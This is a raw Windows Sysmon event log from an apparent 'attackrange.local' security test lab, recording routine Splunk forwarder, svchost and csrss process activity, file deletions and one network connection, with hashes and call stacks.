07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.269{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.254{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x8000000000000000807306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:53.532{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D774ABE1936B04B3DB3DE9458DA87E24,SHA256=F5C9E7A5AFF1ED58E559784544CA6FAD84BF19BAE59E85FEC569020A582997A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.972{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32F04346F76053DE3E9A035F2364CEF1,SHA256=2B3676AF19330C5F605ADB0F65B8FFD5C3A0A7622C83081073C7637E4598BF26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.837{466BC892-F45D-60EB-217D-00000000CF01}48288612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:53.637{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.622{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.574{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89ACE3485A76B4BD2101FDCA2FC8056D,SHA256=6448B2E6C2C5B9299D2C61D3AFAE284E6C437F409FBA35097400076AFFE6ED3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:51.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57245-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.305{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=90E0C805D0CFABCDC0FB02A894E9440E,SHA256=F3C5D8DEC54AC9C9C629B95FDA28E4554D0E20AE56621E794AF94B8F0281D9CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.172{466BC892-F45C-60EB-207D-00000000CF01}52841020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:54.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811A213CA891E2F2D63B86363D51824D,SHA256=BCEE66A0984DCCB6EC55BD59E09D8672B9A42C5E1D594EB72D21DF31D7AD5E88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A344714CCA3CCF51F03AABC57BB5F8D1,SHA256=0D7E989F2338BAA2FC7F0C517A27010784A5AE775AC79DA007DBACFB914EFE69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.305{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.290{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:55.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B43020D2DA4DC2B317EF6C9B1DE019EC,SHA256=85C307357E5AC0D46C358CB1B912F495AB33885D4060BDAD05317FB9329F479B,IMPHASH=00000000000000000000000000000000falsetrue 